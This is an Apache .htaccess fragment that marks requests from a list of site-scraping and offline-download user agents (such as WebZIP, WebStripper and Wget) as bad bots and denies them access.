SetEnvIfNoCase user-agent "^WebSauger" bad_bot


SetEnvIfNoCase user-agent "^Website\ eXtractor" bad_bot


SetEnvIfNoCase user-agent "^Website\ Quester" bad_bot


SetEnvIfNoCase user-agent "^WebStripper" bad_bot


SetEnvIfNoCase user-agent "^WebWhacker" bad_bot


SetEnvIfNoCase user-agent "^WebZIP" bad_bot


SetEnvIfNoCase user-agent "^Wget" bad_bot


SetEnvIfNoCase user-agent "^wget" bad_bot


SetEnvIfNoCase user-agent "^Widow" bad_bot


SetEnvIfNoCase user-agent "^WWWOFFLE" bad_bot


SetEnvIfNoCase user-agent "^Xaldon\ WebSpider" bad_bot


SetEnvIfNoCase user-agent "^Zeus" bad_bot





Order Allow,Deny


Allow from All


Deny from env=bad_bot